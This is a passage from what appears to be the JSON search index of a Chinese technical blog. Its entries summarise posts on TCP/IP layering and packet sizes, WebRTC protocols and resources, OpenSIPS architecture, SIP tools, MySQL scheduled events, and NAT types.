大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。\n","permalink":"https://wdd.js.org/posts/2019/11/gn4aak/","summary":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。","title":"第三种生存"},{"content":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) 
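上面的封装公式可以用一段简单的 shell 算术来验证(MTU 与首部长度均取自本文的数值):

```shell
# 在一个以太网 MTU 大小的 IP 数据报中,留给应用数据的字节数
mtu=1500       # 以太网帧的 IP 数据报上限
ip_hdr=20      # 不带选项的 IPv4 首部
udp_hdr=8      # UDP 首部
tcp_hdr=20     # 不带选项的 TCP 首部
echo "UDP 应用数据: $((mtu - ip_hdr - udp_hdr))"   # 1472
echo "TCP 应用数据: $((mtu - ip_hdr - tcp_hdr))"   # 1460
```

这也解释了为什么 ping 的数据部分超过 1472 字节时,IP 层就必须分片。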
IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。\n","permalink":"https://wdd.js.org/network/ir1i82/","summary":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。","title":"1 概述"},{"content":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing\n","permalink":"https://wdd.js.org/opensips/tools/homer/","summary":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing","title":"homer: 统一的sip包集中处理工具"},{"content":"1 面向连接和面向非连接的区别? 面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。\n","permalink":"https://wdd.js.org/network/kttu4i/","summary":"1 面向连接和面向非连接的区别? 
面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。","title":"技巧1"},{"content":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最长见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!\n","permalink":"https://wdd.js.org/network/base-socket/","summary":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最长见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!","title":"基本套接字API回顾"},{"content":"","permalink":"https://wdd.js.org/posts/2019/11/bhbmum/","summary":"","title":"所有的古镇都是一个样[todo]"},{"content":" 今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。\n","permalink":"https://wdd.js.org/posts/2019/11/gonmzq/","summary":"今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。","title":"买了语雀会员是怎样体验?"},{"content":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for 
voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候因为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。\nemit \u0026ldquo;peerconnection:setremotedescriptionfailed\u0026rdquo; [error**:DOMException:**** Failed to execute \u0026lsquo;setRemoteDescription\u0026rsquo; on \u0026lsquo;RTCPeerConnection\u0026rsquo;:**** Failed to set remote offer sdp****:**** Called with SDP without DTLS fingerprint.**\n一个完整的SIP INVITE信令。其中a=fingerprint:sha-256字段表示DTLS指纹。\na=fingerprint:sha-256 74:CD:F4:A0:3B:46:01:1C:0C:5D:04:D0:17:E5:A4:A1:04:35:97:1C:34:A3:61:60:79:52:02:F3:05:9E:7D:FE\nSDP: Session Description Protocol 
SDP协议用来协商两个SIP UA之间能力,例如媒体编解码能力。sdp协议举例。sdp协议的详细介绍可以参考 RFC4566\nv=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Protocol Version (\u0026ldquo;v=\u0026rdquo;) Origin (\u0026ldquo;o=\u0026rdquo;) Session Name (\u0026ldquo;s=\u0026rdquo;) Session Information (\u0026ldquo;i=\u0026rdquo;) URI (\u0026ldquo;u=\u0026rdquo;) Email Address and Phone Number (\u0026ldquo;e=\u0026rdquo; and \u0026ldquo;p=\u0026rdquo;) Connection Data (\u0026ldquo;c=\u0026rdquo;) Bandwidth (\u0026ldquo;b=\u0026rdquo;) Timing (\u0026ldquo;t=\u0026rdquo;) Repeat Times (\u0026ldquo;r=\u0026rdquo;) Time Zones (\u0026ldquo;z=\u0026rdquo;) Encryption Keys (\u0026ldquo;k=\u0026rdquo;) Attributes (\u0026ldquo;a=\u0026rdquo;) Media Descriptions (\u0026ldquo;m=\u0026rdquo;) 加密 WebRTC对安全性是要求非常高的。无论是信令还是与语音流,WebRTC要求信息传递必须加密。\n数据流使用DTLS协议 媒体流使用SRTP JavaScript API getUserMedia():捕捉音频和视频 RTCPeerConnection:在用户之间流式传输音频和视频 RTCDataChannel:在用户之间传输数据 MediaRecorder:录制音频和视频 参考 WebRTC官网 WebRTC中文网 一步一步学习WebRTC A Study of WebRTC Security ","permalink":"https://wdd.js.org/opensips/ch9/notes/","summary":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 
数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:交互式连接建立(RFC 5245) STUN:用于NAT的会话穿越实用程序(RFC 5389) TURN:使用中继穿越NAT(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候因为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。","title":"WebRTC简介"},{"content":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issues也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc中文网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus 
http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.com/opentok Twilio http://www.twilio.com/client/api Voximplant http://voximplant.com/docs/references/websdk/ Vline https://vline.com/developer/docs/vline.js/ Weemo http://docs.weemo.com/js/ Xirsys http://xirsys.com/_static_content/xirsys.com/docs/ Xsockets.net http://xsockets.net/docs/javascript-client-api VoIP/PSTN https://kamailio.org https://freeswitch.org/ 值得关注的人 https://github.com/muaz-khan https://github.com/chadwallacehart https://github.com/fippo WebRTC主题 github上webrtc主题相关的仓库,干货非常多 https://github.com/topics/webrtc\n相关文章 guide-to-safari-webrtc WebKit: On the Road to WebRTC 1.0, Including VP8 whats-in-a-webrtc-javascript-library ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-ref/","summary":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issues也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc中文网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 
webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.","title":"WebRTC学习资料分享"},{"content":"1. OpenSIPS架构 OpenSIPS主要有两部分构成,\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIPS 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是先存起来,当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头的时候,发现这个头并不存在,但是SIP消息在发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持热脚本更新,如果你改了脚本,想让运行中的OpenSIPS具有新添加的功能,那么必须将OpenSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供了很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的好处是可以使用不同的数据库。\n2.7. 
MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","permalink":"https://wdd.js.org/opensips/ch3/about-opensips/","summary":"1. OpenSIPS架构 OpenSIPS主要有两部分构成,\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIPS 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是先存起来,当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头的时候,发现这个头并不存在,但是SIP消息在发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持热脚本更新,如果你改了脚本,想让运行中的OpenSIPS具有新添加的功能,那么必须将OpenSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供了很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的好处是可以使用不同的数据库。\n2.7. 
MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","title":"opensips介绍"},{"content":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create event e_test on schedule every 1 day do sql语句 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","permalink":"https://wdd.js.org/posts/2019/11/xss1vk/","summary":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create event e_test on schedule every 1 day do sql语句 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","title":"Mysql计划任务:Event Scheduler"},{"content":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UDP应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 
端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","permalink":"https://wdd.js.org/opensips/ch1/deep-in-nat/","summary":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UDP应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","title":"深入NAT网络"},{"content":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内网地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一系列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 
